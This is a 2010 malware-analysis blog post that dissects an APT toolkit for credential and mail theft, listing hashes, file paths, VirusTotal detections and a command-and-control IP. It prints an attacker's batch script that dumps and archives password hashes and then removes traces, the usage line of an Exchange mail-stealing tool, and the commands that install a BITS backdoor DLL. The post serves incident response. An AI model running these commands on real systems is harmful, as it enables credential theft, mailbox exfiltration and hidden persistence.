Friday, July 16, 2010

APT malware #2. Anatomy of a mail / data theft attack. (wiam.exe and others)

These days I see a spike in the number of searches for WIAM.EXE, which is listed as one of the file available for download upon request. I thought I would add a few more details on this file and files associated with it.

While there can be any kind of file named wiam.exe, chances are that your file is similar or identical to the one described below. This file is part malware kind frequently referred to as APT malware. If you find this file on a system, look for others listed below. And yes, as you already guessed, you have a Problem.

According to Mandiant 
"The Advanced Persistent Threat (APT) is a sophisticated and organized cyber attack to access and steal information from compromised computers. The intruders responsible for the APT attacks target the Defense Industrial Base (DIB), financial industry, manufacturing industry, and research industry. The attacks used by the APT intruders are not very different from any other intruder. The main differentiator is the APT intruder’s perseverance and resources. They have malicious code (malware) that circumvents common safeguards such as anti-virus and they tend to generate more activity than wanton “drive by hacks” on the Internet. The intruders also escalate their tools and techniques as a victim firm’s capability to respond improves. Therefore, the APT attacks present different challenges than addressing common computer security breaches."
Download all malware files mentioned below as a password protected archive (contact me if you need the password)
Download additional files mentioned in the update July 16, 2010

 Update: scroll down to see recent additions marked  Update July 16, 2010
 
1. wiam.exe + iam.dll  
The file itself is not really a trojan but a cli tool, part of the modified pass-the-hash toolkit (PSH toolkit) released by Core Technologies.
"The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!)" See Modifying Windows NT Logon Credential
PSH original toolkit files
File: iam.exe  Size: 90112 MD5:  1FF020D6F41CBF73ADF3AF2DE9A08CFD
File: iamdll.dll  Size: 49152  MD5:  DAB43935D17725024CC5EF2DD35CBEDD

http://www.virustotal.com/analisis/8f1f0eb6927d8eb331b36f2f5d0c7b434e2473332dea4acde1d6e96fd758731a-1275930386
 File iam.exe received on 2010.06.07 17:06:26 (UTC)
Result: 5/41 (12.2%)
Authentium    5.2.0.5    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Prot    4.6.0.103    2010.06.07    W32/Heuristic-KPP!Eldorado
Panda    10.0.2.7    2010.06.06    Suspicious file
PCTools    7.0.3.5    2010.06.07    Hacktool.PTHToolkit
Symantec    20101.1.0.89    2010.06.07    Hacktool.PTHToolkit
File size: 90112 bytes
MD5...: 1ff020d6f41cbf73adf3af2de9a08cfd

File iamdll.dll received on 2010.06.07 17:26:26 (UTC)
http://www.virustotal.com/analisis/16f480fcb042e07d89f2a384b52bfce9716c114b374bc8f81a95386651585b65-1275931586
Result: 0/41 (0%)
Additional information
File size: 49152 bytes
MD5...: dab43935d17725024cc5ef2dd35cbedd


=============================
Modified kit
File: wiam.exe  Size: 40960  MD5:  F49CB9A7006FB34E5B5A81AE32358C77
File: iam.dll   Size: 36864  MD5:  30D50F856EFE9BCF7D0A859154CB2F92


http://www.virustotal.com/analisis/bc1c5911eb56fd92bb36507e694ee0629cf114c4ba2729c49b1cd3973e44c125-1275930460
 File wiam.exe received on 2010.06.07 17:07:40 (UTC)
Result: 22/41 (53.66%) 
a-squared    5.0.0.26    2010.06.07    Trojan.Hijacker!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Malware/Win32.Trojan Horse
AntiVir    8.2.2.6    2010.06.07    TR/Hijacker.Gen
Authentium    5.2.0.5    2010.06.07    W32/Heuristic-KPP!Eldorado
Avast    4.8.1351.0    2010.06.07    Win32:Trojan-gen
Avast5    5.0.332.0    2010.06.07    Win32:Trojan-gen
BitDefender    7.2    2010.06.07    Application.Generic.248976
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5019    2010.06.07    UnclassifiedMalware
eSafe    7.0.17.0    2010.06.06    Win32.TRHijacker
F-Prot    4.6.0.103    2010.06.07    W32/Heuristic-KPP!Eldorado
F-Secure    9.0.15370.0    2010.06.07    Application.Generic.248976
GData    21    2010.06.07    Application.Generic.248976
Ikarus    T3.1.1.84.0    2010.06.07    Trojan.Hijacker
McAfee    5.400.0.1158    2010.06.07    Generic.dx!mfu
McAfee-GW-Edition    2010.1    2010.06.07    Generic.dx!mfu
NOD32    5180    2010.06.07    probably a variant of Win32/Agent
Panda    10.0.2.7    2010.06.06    Trj/CI.A
PCTools    7.0.3.5    2010.06.07    Trojan.Generic
Sunbelt    6416    2010.06.07    Trojan.Win32.Generic!BT
Symantec    20101.1.0.89    2010.06.07    Trojan Horse
VirusBuster    5.0.27.0    2010.06.07    Trojan.Hijacker.BUO
Additional information
File size: 40960 bytes
MD5...: f49cb9a7006fb34e5b5a81ae32358c77

File iam.dll received on 2010.06.07 17:22:42 (UTC)
Result: 0/41 (0%)
Additional information
File size: 36864 bytes
MD5...: 30d50f856efe9bcf7d0a859154cb2f92

 You can compare them in a hex editor, the files are not identical but here are similarities in the strings.

iam.exe file from Core

wiam.exe strings (partial, just for comparison)

The files can be found in various subdirectories of

\%userprofle%\local settings\temp
C:\windows\ime\imejp
C:\windows\system32
 C:\windows\system32\temp\

If your attackers are sloppy or if you run data recovery/unerase/unformat tools on the affected machine, you may find other tools and files associated with this type of attack.

2. DumpExt.dll, DumpSvc.exe, PWDumpX.exe
 PWDumpX v1.4 - Dumps domain password cache, LSA secrets, password hashes, and password history hashes.
I don't think these files require much analysis, they are part of a well known password stealing application and the results are needed for pass-the-hash exercises described above


3. m.exe

Update: July 16, 2010. 
You may see MAPI.EXE as a variant, which does the same thing (see download link in the beginning of this post)
VT 0/42 
File size: 227840 bytes
MD5   : c57902ace7ff4173ae41f1292ea85e2a
http://www.virustotal.com/analisis/7a85131da877ac43d85315bd736783ebc62ba41625275efc6ee1ee3a1f60f7fd-1278304255





m.exe is a file you may find together with the files listed. This file might be a standalone creation or a derivative of getmail (many thanks to JM for the tip). See the strings below for comparison.

Once user credentials are changed using the psh toolkit described above (wiam.exe+iam.dll), m.exe cli tool can be used to retrieve email messages of the target from an Exchange server. The usage is the following:

Example:%s -s:sn-server1.mailserver.com -u:exuser4 -t:2006-9-25-14 -o:c:\winnt\temp
%s -s:ExchangeServer -u:UserName -t:YYYY-MM-DD-HH -o:SavePath

One needs to specify user name, server name, date range and location where to save the stolen data.

The email messages will be converted to text and attachments saved in corresponding subfolders. See examples below.

The message formatting will look like this:

From:Jon Doe
To:Jane Smith
Subject:RE: Meeting
Recv Time:08/05/2009 08:27 PM

Hi Jane,

Thanks so much but I will not be able to attend the meeting. 

Best,

Jon
________________________________
From: Jane Smith [mailto:JSmith@company.com]
Sent: Tuesday, August 04, 2009 10:43 AM
To: Jon Doe
Subject: Meeting

Jon, can you join us for the meeting tomorrow?

Thanks
Jane
Until very recently it was 0/41 on VT but now it is 1/41
http://www.virustotal.com/analisis/2903e1865777479f326757ce227711b149a3b893698ec0ad34e3ed0ae3761cc5-1275934263
  File m.exe received on 2010.06.07 18:11:03 (UTC)
Result: 1/41 (2.44%)
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Backdoor.H
Additional information
File size: 215552 bytes
MD5...: 09e25bb934d8523fccd27b86fbf4f8ce

m.exe strings



getmail.exe strings

 4.r.exe or ntfre.exe or any name
The tools get uploaded as an archive (archive be disguised as a temp file like ~WRD0204.tmp) and the stolen data needs to be compressed before it gets taken out, so there can be any kind of archiver involved These are two examples - same kind of cli WinRAR, just different names
(C) 1993-%d Alexander Roshal
beta
Usage:     rar - -
Usage:     unrar - -
               <@listfiles...>

  a             Add files to archive
 File ntfre.exe received on 2010.06.07 18:28:41 (UTC)
http://www.virustotal.com/analisis/1616612517d98e780666efd5b69b9ac5e94e34a661252198c88f0a2cf589792f-1275935321
Current status: Loading ... queued waiting scanning finished NOT FOUND STOPPED
Result: 1/41 (2.44%)
eSafe    7.0.17.0    2010.06.06    Win32.Banker  - not really but they use these in banks too, I am sure (M)
Additional information
File size: 332800 bytes
MD5...: c7e858e4a51ba7d26af9235064988274
  
r.exe is the same MD5 c7e858e4a51ba7d26af9235064988274

5. Batch files to automate the process.
There can be any variety of batch files, their content depends how much typing they don't want to do. Here is an example of a password hash stealing process
Here is an example for pp.bat
cd C:\windows\ime\imejp
ntfre e -p64740629 ~WRD0203.tmp (uncompress ~WRD0203.tmp archive using password 64740629)
del ~WRD0203.tmp (delete the archive)
PWDumpX.exe 127.0.0.1 + +  (dump password hash)
del DumpExt.dll
del DumpSvc.exe
del PWDumpX.exe
del 127.0.0.1-LSASecrets.txt
del 127.0.0.1-PWCache.txt
ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday  C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
del 127.0.0.1-PWHashes.txt
del ntfre.exe
net use \\127.0.0.1\ipc$ /del
del pp.bat

 ntfre.exe a -r -s -m3 -inul -ep1 -n*.txt -hphappyday C:\windows\ime\imejp\~WRD001.tmp C:\windows\ime\imejp
  means the following:
 
-r - add files to archive with all subdirectories  
-m3 - set compression method 3 , which is default (5 is max)
-inul - means suppress messages
ep1  -- means exclude bvase dir name from names
 n* - Uhm, something about specified files not sure
-hphappyday  - set this as archive password 

 6. Backdoor services and files for their installation.
- there are MANY types of services that get modified to serve as backdoors by replacing the legitimate library. I posted a few recent examples before  and  and I will post more  but now I will give one example.


 s.exe

some strings
GetStartupInfoA
cmd /c attrib +h +s qmqrprxy.dll
cmd /c net start bits
cmd /c net stop bits
cmd /c rundll32 qmqrprxy.dll,RundllInstall
qmqrprxy.dll
cmd /c del.bat
del %s
del %s /as
ping 127.0.0.1 -n 3
del.bat
Update July 16, 2010 
Here is a nice recent example for a backdoor service (legitimate library file for a non-essential service gets replaced with a malicious file)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IAS]
"DisplayName"="Authentication Service"
"ObjectName"="LocalSystem"
"Description"="Enables authentication,authorization and accounting of dial-up and VPN users.IAS support the RADIVS protocol"

replaced with ias.dll
File iass.dll received on 2010.07.05 04:11:40 (UTC)
http://www.virustotal.com/analisis/bfaedcb770769f0063a15a429f9e68c12fe0b5e4d13d1850a31c32a1177fb3b1-1278303100
Result: 18/41 (43.90%)
a-squared 5.0.0.31 2010.07.05 Packer.RLPack!IK
AntiVir 8.2.4.2 2010.07.04 TR/Crypt.XPACK.Gen
Authentium 5.2.0.5 2010.07.04 W32/RLPacked.A.gen!Eldorado
Avast 4.8.1351.0 2010.07.04 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.04 Win32:Malware-gen
AVG 9.0.0.836 2010.07.04 BackDoor.Generic12.BLMD
BitDefender 7.2 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Comodo 5321 2010.07.05 Heur.Pck.RLPack
F-Prot 4.6.1.107 2010.07.04 W32/RLPacked.A.gen!Eldorado
F-Secure 9.0.15370.0 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
GData 21 2010.07.05 Gen:Packer.RLPack.D.ai5aaiqnctm
Ikarus T3.1.1.84.0 2010.07.05 Packer.RLPack
McAfee-GW-Edition 2010.1 2010.07.04 Heuristic.LooksLike.Win32.Suspicious.C
Microsoft 1.5902 2010.07.03 Backdoor:Win32/Pingbed.A
nProtect 2010-07-04.02 2010.07.04 Gen:Packer.RLPack.D.ai5aaiqnctm
Panda 10.0.2.7 2010.07.04 Suspicious file
Sophos 4.54.0 2010.07.05 Sus/Encpk-MV
TrendMicro 9.120.0.1004 2010.07.05 PAK_Generic.001
Additional information
File size: 16048 bytes
MD5   : 426f6471b612cf7bb32130fee94cf4c3

Other example of a backdoor file, which does not run as a service. It runs as a separate process and  with the same name ccapp.exe, which is a name of Symantec/Norton Antivirus’ real-time scanner.  
ccapp.exe  19/41 FFA85CB60C3572198A520B866FAE8B15
 File ccapp.exe received on 2010.07.05 04:26:40 (UTC)
Result: 19/41 (46.34%)
AhnLab-V3     2010.07.03.00     2010.07.03     Win32/MalPackedB.suspicious
AntiVir     8.2.4.2     2010.07.04     TR/Crypt.ZPACK.Gen
Authentium     5.2.0.5     2010.07.04     W32/Fujack.U
Avast     4.8.1351.0     2010.07.04     Win32:Malware-gen
Avast5     5.0.332.0     2010.07.04     Win32:Malware-gen
AVG     9.0.0.836     2010.07.04     Win32/Virut.Z
BitDefender     7.2     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Comodo     5321     2010.07.05     TrojWare.Win32.TrojanSpy.KeyLogger.~d02
F-Prot     4.6.1.107     2010.07.04     W32/Fujack.U
F-Secure     9.0.15370.0     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
GData     21     2010.07.05     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Microsoft     1.5902     2010.07.03     Backdoor:Win32/Pingbed.A
Norman     6.05.10     2010.07.04     Fujack.T
nProtect     2010-07-04.02     2010.07.04     Gen:Trojan.Packed.Heur.aiWaKJ7zCbc
Panda     10.0.2.7     2010.07.04     Suspicious file
Sunbelt     6544     2010.07.05     Trojan.Crypt.AntiSig.b (v)
Symantec     20101.1.0.89     2010.07.05     Suspicious.MH690.A
ViRobot     2010.7.3.3920     2010.07.04     Backdoor.Win32.IRCBot.35288
VirusBuster     5.0.27.0     2010.07.04     Packed/RLPack
Additional information
File size: 14257 bytes
MD5   : ffa85cb60c3572198a520b866fae8b15
 ------------------------ end of July 16, 2010 update-------------------------

qmqr.dll or qmqrprxy.dll


C:\WINDOWS\system32\qmqrprxy.dll (32768 Bytes.) - qmqrprxy.dll to replace legitimate BITs service file qmgr.dll - in 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BITS\Parameters
 
Command sequence:
creates
C:\del.bat (56 Bytes.)
installs 
cmd /c rundll32 qmqrprxy.dll,RundllInstall
restarts BITS
cmd /c net stop bits

cmd /c net start bits 

sets attribute to system hidden
cmd /c attrib +h +s qmqrprxy.dll
cmd /c del.bat    - deletes the batch file


BITS firewall bypass - backdoor - see explanation here New Attack Piggybacks on Microsoft's Patch Service or here  Обход фаеров с использованием BITS 

TCP traffic 58.33.154.102:443
Hostname:    102.154.33.58.broad.xw.sh.dynamic.163data.com.cn
ISP:    ChinaNet Shanghai Province Network
Organization:    ChinaNet Shanghai Province Network
Country:    China
State/Region:    Shanghai
 File qmqrprxy.dll received on 2010.06.07 20:28:13 (UTC)  - originally was 2/41 on VT
http://www.virustotal.com/analisis/a48c83859d3430c6fc5606ba8da4c38353cb1a93cb01e7f53e3122600147cc26-1275942493
Result: 25/41 (60.98%)
a-squared    5.0.0.26    2010.06.07    Trojan-Downloader.Win32.Small!IK
AhnLab-V3    2010.06.06.00    2010.06.06    Win-Trojan/Atraps.32768.N
AntiVir    8.2.2.6    2010.06.07    TR/ATRAPS.Gen
Avast    4.8.1351.0    2010.06.07    Win32:Malware-gen
Avast5    5.0.332.0    2010.06.07    Win32:Malware-gen
AVG    9.0.0.787    2010.06.07    BackDoor.Generic12.KBM
BitDefender    7.2    2010.06.07    Trojan.Generic.2664831
CAT-QuickHeal    10.00    2010.06.07    Trojan.Agent.ATV
Comodo    5020    2010.06.07    TrojWare.Win32.GameThief.Nilage.~CRSH
F-Secure    9.0.15370.0    2010.06.07    Trojan.Generic.2664831
GData    21    2010.06.07    Trojan.Generic.2664831
Ikarus    T3.1.1.84.0    2010.06.07    Trojan-Downloader.Win32.Small
Kaspersky    7.0.0.125    2010.06.07    Backdoor.Win32.Small.iog
McAfee-GW-Edition    2010.1    2010.06.07    Heuristic.BehavesLike.Win32.Downloader.H
Microsoft    1.5802    2010.06.07    TrojanDownloader:Win32/Troxen!rts
NOD32    5180    2010.06.07    a variant of Win32/Agent.WQS
Norman    6.04.12    2010.06.07    W32/Atraps.EZM
nProtect    2010-06-07.01    2010.06.07    Trojan.Generic.2664831
Panda    10.0.2.7    2010.06.07    Trj/CI.A
PCTools    7.0.3.5    2010.06.07    Trojan.ADH
Prevx    3.0    2010.06.07    High Risk Worm
Sunbelt    6416    2010.06.07    Trojan.Win32.Small
Symantec    20101.1.0.89    2010.06.07    Trojan.ADH
TrendMicro    9.120.0.1004    2010.06.07    BKDR_SMALL.LOP
TrendMicro-HouseCall    9.120.0.1004    2010.06.07    BKDR_SMALL.LOP
Additional information
File size: 32768 bytes
MD5...: 03b3cceb253fd782590cf0efafd49d5f

There can be a few other files as well, this is a basic pack that is needed to pull it off. I will be adding more files related to this type of attack and other APT malware but feel free to email me if you have questions or comments.

No comments:

Post a Comment